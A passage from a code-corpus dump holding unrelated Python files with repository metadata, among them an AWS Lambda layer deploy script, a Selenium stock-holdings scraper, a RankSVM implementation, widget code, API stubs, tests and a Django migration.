curarray = delimited_file_utils.open_delimited_with_sniffer_and_check(curfile)
labels = curarray[0,:]
data = curarray[1:,:]
bool_vect = labels == good_labels
test1 = bool_vect.all()
test2 = data.shape == (9,7)
if test1 and test2:
passes.append(curfile)
else:
failures.append(curfile)
if len(failures) == 0:
print('all tests pass')
else:
print('passes:')
for curfile in passes:
print(curfile)
print('-----------------------------')
print('failures:')
for curfile in failures:
print(curfile)
| [
"ryanlists@gmail.com"
] | ryanlists@gmail.com |
5df4cb7698d616222b871122a1bd80d5a80a62ff | d5e279c64f7615cd14d82c59aca2ee17eef1c8f1 | /scripts/deploy-layer.py | 6830a56542322f06b17f3d9bd32892a6ce3a7194 | [] | no_license | kylebarron/cogeo-layer | d075ca12b95edf4731d89c2d68a548ec68c8a881 | f04d14ebf99dfcfa71ae5584a818956e91e8f0fa | refs/heads/master | 2021-04-18T14:25:31.567363 | 2020-03-24T03:08:34 | 2020-03-24T03:08:34 | 249,553,335 | 5 | 0 | null | 2020-03-23T23:25:28 | 2020-03-23T21:58:23 | null | UTF-8 | Python | false | false | 2,576 | py |
import click
import hashlib
from boto3.session import Session as boto3_session
AWS_REGIONS = [
"eu-central-1",
"us-east-1",
"us-east-2",
"us-west-1",
"us-west-2",
]
def _md5(fname):
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
@click.command()
@click.argument('gdalversion', type=str)
@click.argument('pythonversion', type=str)
@click.argument('layername', type=str)
def main(gdalversion, pythonversion, layername):
local_name = f"gdal{gdalversion}-py{pythonversion}-{layername}.zip"
next_layer_sha = _md5(local_name)
runtime = f"python{pythonversion}"
gdalversion_nodot = gdalversion.replace(".", "")
pythonversion_nodot = pythonversion.replace(".", "")
layer_name = f"gdal{gdalversion_nodot}-py{pythonversion_nodot}-{layername}"
description = f"Lambda Layer with GDAL{gdalversion} - {runtime} - {next_layer_sha}"
session = boto3_session()
click.echo(f"Deploying {layer_name}", err=True)
for region in AWS_REGIONS:
click.echo(f"AWS Region: {region}", err=True)
client = session.client("lambda", region_name=region)
res = client.list_layer_versions(
CompatibleRuntime=runtime, LayerName=layer_name
)
layers = res.get("LayerVersions")
click.echo(f"Found {len(layers)} versions.", err=True)
if layers:
layer = layers[0]
layer_sha = layer["Description"].split(" ")[-1]
else:
layer_sha = ""
click.echo(f"Current SHA: {layer_sha}", err=True)
click.echo(f"New SHA: {next_layer_sha}", err=True)
if layer_sha == next_layer_sha:
click.echo("No update needed", err=True)
continue
click.echo(f"Publishing new version", err=True)
with open(local_name, 'rb') as zf:
res = client.publish_layer_version(
LayerName=layer_name,
Content={"ZipFile": zf.read()},
CompatibleRuntimes=[runtime],
Description=description,
LicenseInfo="MIT"
)
version = res["Version"]
click.echo(f"Adding permission", err=True)
client.add_layer_version_permission(
LayerName=layer_name,
VersionNumber=version,
StatementId='make_public',
Action='lambda:GetLayerVersion',
Principal='*',
)
if __name__ == '__main__':
main()
| [
"vincent.sarago@gmail.com"
] | vincent.sarago@gmail.com |
f9cfddcd3da8437fd43cbe1a9e37a49a32c199a0 | 0b406d2c041c76d9ef8789539e0e3af9a50e3613 | /Extract_refactor/WebScrapy/manager.py | 37fd76cb4a79a41b493987d4e7ca799edc0f8929 | [] | no_license | aise17/ExtractPdf | 221b47c5f0e75a823284b4f52981917962042592 | 7e1bfbc759cb7473d727574e5df78eaaac9fa8a4 | refs/heads/master | 2022-02-26T06:39:14.265795 | 2019-06-04T15:01:39 | 2019-06-04T15:01:39 | 184,154,301 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,329 | py | from Extract_refactor.settings import IMAGENES_PATH
from .web_info import WebInfo
import unicodecsv as csv
class Manager(WebInfo):
def __init__(self, ruta_entrada):
#self.resultados = {'status': 200, 'alexa': u'\n\n4,484,464 ', 'language': u'es-es', 'url': 'http://todosaintseiya.com', 'platform': ['prestashop'], 'mail': u'.todosaintseiya@hotmail.com.TODOSAINTSEIYA@HOTMAIL.COM'}
self.urls_list = []
self.writer = ''
self.ruta_entrada = ruta_entrada
def open_book_writer(self):
f = open('salida/' + self.ruta_entrada, 'wb')
self.writer = csv.writer(f, lineterminator='\n', encoding='utf-8')
self.writer.writerow(('url','alexa', 'status', 'platform', 'language', 'mail'))
def open_book_append(self):
f = open('salida/' + self.ruta_entrada, 'ab')
self.writer = csv.writer(f, lineterminator='\n', encoding='utf-8')
def export(self):
self.writer.writerow((self.resultados['url'], self.resultados['alexa'], self.resultados['status'], self.resultados['platform'], self.resultados['language'], self.resultados['mail']))
def imports(self):
with open('media/' + self.ruta_entrada, 'rb') as f:
reader = csv.reader(f, encoding='utf-8')
for row in reader:
self.urls_list.append(row)
print (self.urls_list)
#manager = Manager()
#manager.imports()
| [
"sergio.martinez-g@hotmail.com"
] | sergio.martinez-g@hotmail.com |
7d1a8e1308c251ab8962fd8e55d64f1b6591f4cd | 0c0168a4676bce7453836a7509e7133044aa8975 | /byceps/services/shop/order/models/action.py | a522c5bf75985a56a31b5bdbfde5a96a124daac9 | [
"BSD-3-Clause"
] | permissive | byceps/byceps | 0aad3c4d974f76c6f8c3674d5539a80c9107b97a | eaee2b7fdc08c76c16ddf7f436110e0b5f1812e5 | refs/heads/main | 2023-09-01T04:03:13.365687 | 2023-09-01T03:28:18 | 2023-09-01T03:28:18 | 40,150,239 | 44 | 23 | BSD-3-Clause | 2023-05-16T18:41:32 | 2015-08-03T22:05:23 | Python | UTF-8 | Python | false | false | 565 | py | """
byceps.services.shop.order.models.action
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2014-2023 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from dataclasses import dataclass
from typing import Any
from uuid import UUID
from byceps.services.shop.article.models import ArticleID
from .order import PaymentState
ActionParameters = dict[str, Any]
@dataclass(frozen=True)
class Action:
id: UUID
article_id: ArticleID
payment_state: PaymentState
procedure_name: str
parameters: ActionParameters
| [
"homework@nwsnet.de"
] | homework@nwsnet.de |
2e0c98154ff9965f3b78d4ec24114cbfb88b9b4a | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/63/usersdata/209/32491/submittedfiles/swamee.py | 4e0b7ced6a958750f520d5f31ba92b776a1694b6 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 478 | py | # -*- coding: utf-8 -*-
import math
#COMECE SEU CÓDIGO AQUI
f=float(input('digite o valor f:'))
L=float(input('Digite o valor L:'))
Q=float(input('Digite o valor Q:'))
DELTAH=float(input('Digite o valor DELTAH:'))
V=float(input('digite o valor V:'))
g=9.81
e=0.000002
D=((8*f*L*(Q**2))/((math.pi**2)*g*DELTAH))**(1/5)
Rey=4*Q/math.pi*D*V
k=(0.25/(math.log10((e/3.7*D)+(5.74/Rey**0.9)))**2
print('O valor D é %.4f'%D)
print('O valor Rey é %.4f'%Rey)
print('O valor k é %f'%k) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
30017f7b526335a428e035841353278b9d337ae7 | 997180420fabdd6f730f4673dba1f979bd91e699 | /apps/goods/t1.py | 70106faaf0574a7c9f66d963b3cb6942a4f54227 | [] | no_license | bwisgood/drf20F_api_pro | 66bb17479594247a2e74e4eef7434cdaf8b54de9 | ff4579ce8eaca7071ea27b5d071a58dbf63c2385 | refs/heads/master | 2020-03-27T02:52:28.973201 | 2018-09-20T05:01:40 | 2018-09-20T05:01:40 | 145,823,482 | 1 | 0 | null | 2018-08-23T14:00:24 | 2018-08-23T08:20:25 | JavaScript | UTF-8 | Python | false | false | 243 | py | class A:
a = 1
def __init__(self):
b = 2
def __repr__(self):
return "123"
def __str__(self):
return "456"
if __name__ == '__main__':
a = A()
print(repr(a))
print(a.__repr__())
print(a) | [
"857464370@qq.com"
] | 857464370@qq.com |
588728ae141a1688b6adb628431a81037164d133 | 7b437e095068fb3f615203e24b3af5c212162c0d | /enaml/qt/qt_time_selector.py | 44ed2090c63a693722eb360745f4e4e37af26edb | [
"BSD-3-Clause"
] | permissive | ContinuumIO/enaml | d8200f97946e5139323d22fba32c05231c2b342a | 15c20b035a73187e8e66fa20a43c3a4372d008bd | refs/heads/master | 2023-06-26T16:16:56.291781 | 2013-03-26T21:13:52 | 2013-03-26T21:13:52 | 9,047,832 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,978 | py | #------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from PyQt4.QtGui import QTimeEdit
from atom.api import Typed
from enaml.widgets.time_selector import ProxyTimeSelector
from .qt_bounded_time import QtBoundedTime, CHANGED_GUARD
class QtTimeSelector(QtBoundedTime, ProxyTimeSelector):
""" A Qt implementation of an Enaml ProxyTimeSelector.
"""
#: A reference to the widget created by the proxy.
widget = Typed(QTimeEdit)
#--------------------------------------------------------------------------
# Initialization API
#--------------------------------------------------------------------------
def create_widget(self):
""" Create the QTimeEdit widget.
"""
self.widget = QTimeEdit(self.parent_widget())
def init_widget(self):
""" Initialize the widget.
"""
super(QtTimeSelector, self).init_widget()
d = self.declaration
self.set_time_format(d.time_format)
self.widget.timeChanged.connect(self.on_time_changed)
#--------------------------------------------------------------------------
# Abstract API Implementation
#--------------------------------------------------------------------------
def get_time(self):
""" Return the current time in the control.
Returns
-------
result : time
The current control time as a time object.
"""
return self.widget.time().toPyTime()
def set_minimum(self, time):
""" Set the widget's minimum time.
Parameters
----------
time : time
The time object to use for setting the minimum time.
"""
self.widget.setMinimumTime(time)
def set_maximum(self, time):
""" Set the widget's maximum time.
Parameters
----------
time : time
The time object to use for setting the maximum time.
"""
self.widget.setMaximumTime(time)
def set_time(self, time):
""" Set the widget's current time.
Parameters
----------
time : time
The time object to use for setting the date.
"""
self._guard |= CHANGED_GUARD
try:
self.widget.setTime(time)
finally:
self._guard &= ~CHANGED_GUARD
def set_time_format(self, format):
""" Set the widget's time format.
Parameters
----------
format : str
A Python time formatting string.
"""
# XXX make sure Python's and Qt's format strings are the
# same, or convert between the two.
self.widget.setDisplayFormat(format)
| [
"sccolbert@gmail.com"
] | sccolbert@gmail.com |
9c55db4b00565f4ffe3a2d50ced5d3e2220ced2e | 32cb0be487895629ad1184ea25e0076a43abba0a | /LifePictorial/top/api/rest/PictureUpdateRequest.py | b32556481ce925c61750073a18148e80e3b936fa | [] | no_license | poorevil/LifePictorial | 6814e447ec93ee6c4d5b0f1737335601899a6a56 | b3cac4aa7bb5166608f4c56e5564b33249f5abef | refs/heads/master | 2021-01-25T08:48:21.918663 | 2014-03-19T08:55:47 | 2014-03-19T08:55:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | '''
Created by auto_sdk on 2014-02-10 16:59:30
'''
from top.api.base import RestApi
class PictureUpdateRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.new_name = None
self.picture_id = None
def getapiname(self):
return 'taobao.picture.update'
| [
"poorevil@gmail.com"
] | poorevil@gmail.com |
2157f5ad78c10962340a58bdd733a32257639f36 | 6e3d061f94468905841a918278a352d4e5df89a1 | /hashicorp_vault_client/test/test_body70.py | 4abc0cc541b05ec6a2c886617b334da9410acb06 | [
"Apache-2.0"
] | permissive | drewmullen/HAC | 179a4188e6e6ce3a36d480e45f238fd0901a710f | fb185804fd244366f8f8d01df22835b3d96e7512 | refs/heads/master | 2020-08-03T12:13:08.785915 | 2019-10-03T18:33:04 | 2019-10-03T18:33:04 | 211,749,364 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 868 | py | # coding: utf-8
"""
HashiCorp Vault API
HTTP API that gives you full access to Vault. All API routes are prefixed with `/v1/`. # noqa: E501
OpenAPI spec version: 1.2.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import hashicorp_vault_client
from models.body70 import Body70 # noqa: E501
from hashicorp_vault_client.rest import ApiException
class TestBody70(unittest.TestCase):
"""Body70 unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testBody70(self):
"""Test Body70"""
# FIXME: construct object with mandatory attributes with example values
# model = hashicorp_vault_client.models.body70.Body70() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"drew@nebulaworks.com"
] | drew@nebulaworks.com |
bc31123ae5db9b82f65e97d1036afeff59cb28f4 | 5af41b5507a535cc228673f05c5da215c93a76b5 | /practice/puzzles/medium/Flood fill Example.py | 79d3877a13788695f417bc1a52f1ef3d83e793f1 | [] | no_license | mithrantir/CodinGame | d308f50f3d74bb105e678d0b66e439c68b07f9a1 | 306ead31859b3b499019adadbdd41631781ad192 | refs/heads/master | 2022-07-14T20:41:05.380179 | 2020-05-17T21:15:15 | 2020-05-17T21:15:15 | 259,610,126 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,169 | py |
with open('000.txt') as f:
read_data = f.read().split('\n')
w = int(read_data[0])
h = int(read_data[1])
# w = int(input())
# h = int(input())
alderaan = []
for i in range(h):
# alderaan.append([c for c in input()])
alderaan.append([c for c in read_data[2+i]])
tower = {}
for i in range(h):
for j in range(w):
if alderaan[i][j] != '.' and alderaan[i][j] != '#':
tower[(i, j)] = [[i, j]]
expand = True
while expand:
exp_points = {}
for (tx, ty) in tower:
tow_exp = []
for i, j in tower[(tx, ty)]:
if i > 0 and alderaan[i - 1][j] == '.':
tow_exp.append([i - 1, j])
if (i - 1, j) in exp_points and exp_points[(i - 1, j)][1] != [tx, ty]:
exp_points[(i - 1, j)] = ['+', [-1, -1]]
else:
exp_points[(i - 1, j)] = [alderaan[tx][ty], [tx, ty]]
if i < h - 1 and alderaan[i + 1][j] == '.':
tow_exp.append([i + 1, j])
if (i + 1, j) in exp_points and exp_points[(i + 1, j)][1] != [tx, ty]:
exp_points[(i + 1, j)] = ['+', [-1, -1]]
else:
exp_points[(i + 1, j)] = [alderaan[tx][ty], [tx, ty]]
if j > 0 and alderaan[i][j - 1] == '.':
tow_exp.append([i, j - 1])
if (i, j - 1) in exp_points and exp_points[(i, j - 1)][1] != [tx, ty]:
exp_points[(i, j - 1)] = ['+', [-1, -1]]
else:
exp_points[(i, j - 1)] = [alderaan[tx][ty], [tx, ty]]
if j < w - 1 and alderaan[i][j + 1] == '.':
tow_exp.append([i, j + 1])
if (i, j + 1) in exp_points and exp_points[(i, j + 1)][1] != [tx, ty]:
exp_points[(i, j + 1)] = ['+', [-1, -1]]
else:
exp_points[(i, j + 1)] = [alderaan[tx][ty], [tx, ty]]
tower[(tx, ty)] = tow_exp
if len(exp_points) == 0:
expand = False
else:
for (i, j) in exp_points:
alderaan[i][j] = exp_points[(i, j)][0]
for i in range(h):
print("".join(c for c in alderaan[i]))
| [
"christophoros.mouratidis@gmail.com"
] | christophoros.mouratidis@gmail.com |
9a7925334b208a1c4ede6feb518cced7303356b4 | fb0018545b1f0646a59a51522fd32ccbaf4c0bb7 | /py/escher/tests/test_urls.py | 1fd5806a34e1380e1a858f5be0f0e0a1b333f9ad | [
"MIT"
] | permissive | DD-DeCaF/escher | 083341268dad2195b402ae80391eb93e54b88365 | cd2c81bc62199f9349a9f24dd7a0a148fa6adc46 | refs/heads/master | 2022-07-24T18:49:55.835648 | 2020-02-15T14:48:52 | 2020-02-15T14:51:22 | 84,944,610 | 1 | 0 | NOASSERTION | 2018-10-08T08:50:49 | 2017-03-14T12:06:53 | JavaScript | UTF-8 | Python | false | false | 887 | py | from escher.urls import (
get_url,
get_filepath,
root_directory,
)
from escher.version import (
__version__,
__schema_version__,
__map_model_version__,
)
from os.path import join, exists
from pytest import raises
def test_online():
url = get_url('escher')
assert url == 'https://unpkg.com/escher@%s/dist/escher.js' % __version__
def test_local():
assert exists(get_filepath('map_jsonschema'))
def test_index_url():
url = get_url('server_index')
assert url == ('https://escher.github.io/%s/%s/index.json' %
(__schema_version__, __map_model_version__))
def test_map_download_url():
url = get_url('map_download')
assert url == ('https://escher.github.io/%s/%s/maps/' %
(__schema_version__, __map_model_version__))
def test_bad_url():
with raises(Exception):
get_url('bad-name')
| [
"zaking17@gmail.com"
] | zaking17@gmail.com |
d2309b65fbdf81233c3fec89a1b2055bfd35d8cb | d8761daf7bf2b75b9925b12450da2a6ea3d31140 | /tlbo/utils/rank_svm.py | c29c536605ebe543d3a59c20d0899f65957ca633 | [] | no_license | pyz2020/efficient-tlbo-DL-Model-Reoptimizations | 5dcc2c522d9430b4fab534689fd338fbfc6a6945 | dd2ed9c91b970e0ab4c0ed82382567ec0df6c42b | refs/heads/master | 2023-01-06T18:33:33.726527 | 2020-11-04T08:09:13 | 2020-11-04T08:09:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,459 | py | import itertools
import numpy as np
from scipy import stats
from sklearn import svm, linear_model, model_selection
def transform_pairwise(X, y):
"""Transforms data into pairs with balanced labels for ranking
Transforms a n-class ranking problem into a two-class classification
problem. Subclasses implementing particular strategies for choosing
pairs should override this method.
In this method, all pairs are choosen, except for those that have the
same target value. The output is an array of balanced classes, i.e.
there are the same number of -1 as +1
Parameters
----------
X : array, shape (n_samples, n_features)
The data
y : array, shape (n_samples,) or (n_samples, 2)
Target labels. If it's a 2D array, the second column represents
the grouping of samples, i.e., samples with different groups will
not be considered.
Returns
-------
X_trans : array, shape (k, n_feaures)
Data as pairs
y_trans : array, shape (k,)
Output class labels, where classes have values {-1, +1}
"""
X_new = []
y_new = []
y = np.asarray(y)
if y.ndim == 1:
y = np.c_[y, np.ones(y.shape[0])]
comb = itertools.combinations(range(X.shape[0]), 2)
for k, (i, j) in enumerate(comb):
if y[i, 0] == y[j, 0] or y[i, 1] != y[j, 1]:
# skip if same target or different group
continue
X_new.append(X[i] - X[j])
y_new.append(np.sign(y[i, 0] - y[j, 0]))
# output balanced classes
if y_new[-1] != (-1) ** k:
y_new[-1] = - y_new[-1]
X_new[-1] = - X_new[-1]
return np.asarray(X_new), np.asarray(y_new).ravel()
class RankSVM(object):
"""Performs pairwise ranking with an underlying LinearSVC model
Input should be a n-class ranking problem, this object will convert it
into a two-class classification problem, a setting known as
`pairwise ranking`.
See object :ref:`svm.LinearSVC` for a full description of parameters.
"""
def __init__(self):
self.clf = svm.SVC(kernel='linear', C=.1)
self.coef = None
def fit(self, X, y):
"""
Fit a pairwise ranking model.
Parameters
----------
X : array, shape (n_samples, n_features)
y : array, shape (n_samples,) or (n_samples, 2)
Returns
-------
self
"""
X_trans, y_trans = transform_pairwise(X, y)
self.clf.fit(X_trans, y_trans)
self.coef = self.clf.coef_.ravel() / np.linalg.norm(self.clf.coef_)
def predict(self, X):
if self.coef is not None:
return np.dot(X, self.coef)
else:
raise ValueError("Must call fit() prior to predict()")
def score(self, X, y):
print(np.dot(X, self.coef).shape)
print(y.shape)
tau, _ = stats.kendalltau(np.dot(X, self.coef), y)
return tau
if __name__ == '__main__':
# as showcase, we will create some non-linear data
# and print the performance of ranking vs linear regression
np.random.seed(1)
n_samples, n_features = 300, 5
true_coef = np.random.randn(n_features)
X = np.random.randn(n_samples, n_features)
noise = np.random.randn(n_samples) / np.linalg.norm(true_coef)
y = np.dot(X, true_coef)
y = np.arctan(y) # add non-linearities
y += .1 * noise # add noise
Y = np.c_[y, np.mod(np.arange(n_samples), 5)] # add query fake id
kf = model_selection.KFold(n_splits=5, shuffle=True)
# cv = model_selection.KFold(n_samples, 5)
train, test = list(iter(kf))[-1]
# make a simple plot out of it
# import pylab as pl
# pl.scatter(np.dot(X, true_coef), y)
# pl.title('Data to be learned')
# pl.xlabel('<X, coef>')
# pl.ylabel('y')
# pl.show()
# print the performance of ranking
rank_svm = RankSVM()
rank_svm.fit(X[train], Y[train])
print('Performance of ranking ', rank_svm.score(X[test], Y[test][:, 0]))
# print(rank_svm.predict(X[test]))
# and that of linear regression
ridge = linear_model.RidgeCV(fit_intercept=True)
ridge.fit(X[train], y[train])
# X_test_trans, y_test_trans = transform_pairwise(X[test], y[test])
# score = np.mean(np.sign(np.dot(X_test_trans, ridge.coef_)) == y_test_trans)
score, _ = stats.kendalltau(np.dot(X[test], ridge.coef_), Y[test][:, 0])
print('Performance of linear regression ', score)
| [
"1225646303@qq.com"
] | 1225646303@qq.com |
82575ef7f307733145700be6a98b158fd12278da | d0d1e07c984651f96bd9386d546c85c0341e46b2 | /scripts/kivy_experiments/importing/wombat2.py | 17307767b7aa1edc3ac0fe22fb3bb81f93eacf4a | [
"MIT"
] | permissive | timedata-org/timedata | 61cde905b1fe9eb60ac83ecbf5a5a2114793c45d | 3faac7450678aaccd4a283d0d41ca3e7f113f51b | refs/heads/master | 2020-04-11T12:03:57.962646 | 2019-06-09T10:05:16 | 2019-06-09T10:05:52 | 51,217,217 | 5 | 3 | null | 2016-09-18T16:20:43 | 2016-02-06T19:13:43 | C++ | UTF-8 | Python | false | false | 173 | py | from kivy.uix.label import Label
class Wombat2(Label):
def __init__(self, *args, **kwds):
super().__init__(*args, **kwds)
print('wombat2 constructed')
| [
"tom@swirly.com"
] | tom@swirly.com |
4ed252d7f3459a256fba7d6f46a04fdc456dec6c | 3d50f97420e7aa79be37cc238555ef2038064afb | /stocks/tests/models/test_HSGTCGHold.py | 5bc7b08ac0cbc7b9c39c326e5fcb5beff4924753 | [
"MIT"
] | permissive | tauruswang/wanggeService | d6948704f5e28c1603e864e32986cc91eaf816b2 | 7aa6687ece9a865930c5dbab506cad5955848457 | refs/heads/master | 2020-03-19T05:52:36.264023 | 2018-06-01T03:32:27 | 2018-06-01T03:32:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,490 | py | # -*- coding: utf-8 -*-
"""
-------------------------------------------------
@File : test_HSGTCGHold.py
Description :
@Author : pchaos
date: 2018-5-31
-------------------------------------------------
Change Activity:
18-5-31:
@Contact : p19992003#gmail.com
-------------------------------------------------
"""
from django.test import TestCase
from stocks.models import HSGTCGHold
import selenium
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from bs4 import BeautifulSoup
import re
import pandas as pd
import numpy as np
import datetime, time
__author__ = 'pchaos'
class TestHSGTCGHold(TestCase):
def test_stockstatistics(self):
""" 北持股向市值大于八千万
:return:
"""
browser = webdriver.Firefox()
browser.maximize_window()
try:
results = []
pages = range(1, 37, 1)
pages = range(1, 250, 1) # 30日市值排序
url = 'http://data.eastmoney.com/hsgtcg/StockStatistics.aspx'
browser.get(url)
# 北向持股
browser.find_element_by_css_selector('.border_left_1').click()
time.sleep(2)
# 市值排序
browser.find_element_by_css_selector(
'#tb_ggtj > thead:nth-child(1) > tr:nth-child(1) > th:nth-child(8)').click()
time.sleep(1.5)
for page in pages:
soup = BeautifulSoup(browser.page_source, 'lxml')
table = soup.find_all(id='tb_ggtj')[0]
df = pd.read_html(str(table), header=1)[0]
df.columns = ['tradedate', 'code', 'name', 'a1', 'close', 'zd', 'hvol', 'hamount', 'hpercent', 'oneday',
'fiveday',
'tenday']
# 修复code长度,前补零
df['code'] = df.code.astype(str)
df['code'] = df['code'].apply(lambda x: x.zfill(6))
# 修复持股数量
df['hvol'] = df['hvol'].apply(lambda x: HSGTCGHold.hz2Num(x)).astype(float)
df['hamount'] = df['hamount'].apply(lambda x: HSGTCGHold.hz2Num(x)).astype(float)
# 删除多余的列
del df['oneday']
del df['fiveday']
del df['tenday']
del df['a1']
results.append(df[df['hamount'] >= 8000])
if len(df[df['hamount'] < 8000]):
# 持股金额小于
break
else:
# 下一页
t = browser.find_element_by_css_selector('#PageContgopage')
t.clear()
t.send_keys(str(page + 1))
btnenable = True
while btnenable:
try:
btn=browser.find_element_by_css_selector('.btn_link')
btn.click()
btnenable =False
except Exception as e:
print('not ready click. Waiting')
time.sleep(0.1)
time.sleep(1.5)
# print(df)
print('results\n{}'.format(results))
finally:
if browser:
browser.close()
self.assertTrue(len(results) > 3)
# results 整合
dfn = pd.DataFrame()
for dfa in results:
dfn = pd.concat([dfn, dfa])
dfn.reset_index(drop=True, inplace=True)
self.assertFalse(dfn[['code', 'tradedate']] is None)
df = dfn[['code', 'tradedate']]
# 去除重复数据
df = df[~df.duplicated()]
# pandas dataframe save to model
HSGTCGHold.objects.bulk_create(
HSGTCGHold(**vals) for vals in df[['code', 'tradedate']].to_dict('records')
)
self.assertTrue(HSGTCGHold.getlist().count() > 0, '北向持股大于七千万的股票数量大于0')
print(HSGTCGHold.getlist())
def test_importList(self):
HSGTCGHold.importList()
hsg = HSGTCGHold.getlist(tradedate=datetime.datetime.now().date() - datetime.timedelta(1))
self.assertTrue(hsg.count() > 10 , '北向持股大于七千万的股票数量大于10, 实际数量:{}'.format(hsg.count()))
self.assertTrue(isinstance(hsg[0].tradedate, datetime.date))
| [
"drifthua@gmail.com"
] | drifthua@gmail.com |
0417c2835eac339494cbb1098e8e8fd018780afa | 8d86f0d90a36b97903d07455edb37611a6958832 | /Apps/users/migrations/0001_initial.py | d7bdc634de207e4003b00c5aec1e4d014aaca00a | [] | no_license | urimeba/diagnosticapp | 4615232224e61e513dcce6557197eeca9b9ece86 | 311bdadabe6c2883c6d7395963cd23c3d7ebca03 | refs/heads/main | 2023-01-21T07:48:04.510799 | 2020-11-30T21:28:21 | 2020-11-30T21:28:21 | 313,359,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,037 | py | # Generated by Django 3.1.3 on 2020-11-23 19:29
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=150, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('genero', models.CharField(choices=[('H', 'Hombre'), ('M', 'Mujer')], max_length=1, null=True, verbose_name='Genero')),
('edad', models.PositiveIntegerField(null=True)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name_plural': 'Usuarios',
'ordering': ['id'],
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
]
| [
"urimeba511@gmail.com"
] | urimeba511@gmail.com |
7bb83d0baa185fe756143ee095e6f0fecca1c70b | dafafb8f65cd93dd1f6567d9b8e431e31f19ae68 | /dms/views/apply/music.py | de272d9f96fe77147c3b2527b8dad48277fe174a | [
"MIT"
] | permissive | SangminOut/DMS-Sanic | 7fb877b2a772de808b7391428e151b2a2645c59d | bbb65c584711fa23dbf0455300307c2acceba013 | refs/heads/master | 2020-06-15T06:11:33.116199 | 2019-07-14T12:57:11 | 2019-07-14T12:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 481 | py | from sanic.request import Request
from sanic.views import HTTPMethodView
class MusicApplyView(HTTPMethodView):
def get(self, request: Request, weekday: int):
"""
Response Music Apply Status
"""
pass
def post(self, request: Request, weekday: int):
"""
Apply Music
"""
pass
def delete(self, request: Request, weekday: int):
"""
Delete Music apply on the weekday
"""
pass
| [
"python@istruly.sexy"
] | python@istruly.sexy |
24430bb2f438aace2477e6ae54cfe4c876848f5c | 4dd695521343d56ff943e8c1768343d7680714e3 | /experiments/scripts_auto_closedset_ynoguti/config_SVM_128_fold10.py | f5343d3ddb38f0516fe592dabbc19c413e186cf9 | [] | no_license | natharb/environment | ea659ee541f6473e92b5b30c549e52b66f47b280 | 86e6cee6e01d2370abeb7c55a2c8a15001735919 | refs/heads/master | 2021-09-28T02:39:02.222966 | 2018-11-13T12:03:34 | 2018-11-13T12:03:34 | 139,762,646 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,353 | py | #!/usr/bin/env python
# vim: set fileencoding=utf-8 :
#Nathália Alves Rocha Batista (nathbapt@decom.fee.unicamp.br)
import sys
sys.path.insert(0, '.')
import bob.bio.spear
import bob.bio.gmm
import numpy
import scipy.spatial
temp_directory = './results/closedset_ynoguti/SVM/128/fold_10/temp/'
result_directory = './results/closedset_ynoguti/SVM/128/fold_10/results/'
sub_directory = 'subdirectory'
database = 'database_SVM_128_fold10.py'
groups = ['dev']
#groups = ['dev', 'eval']
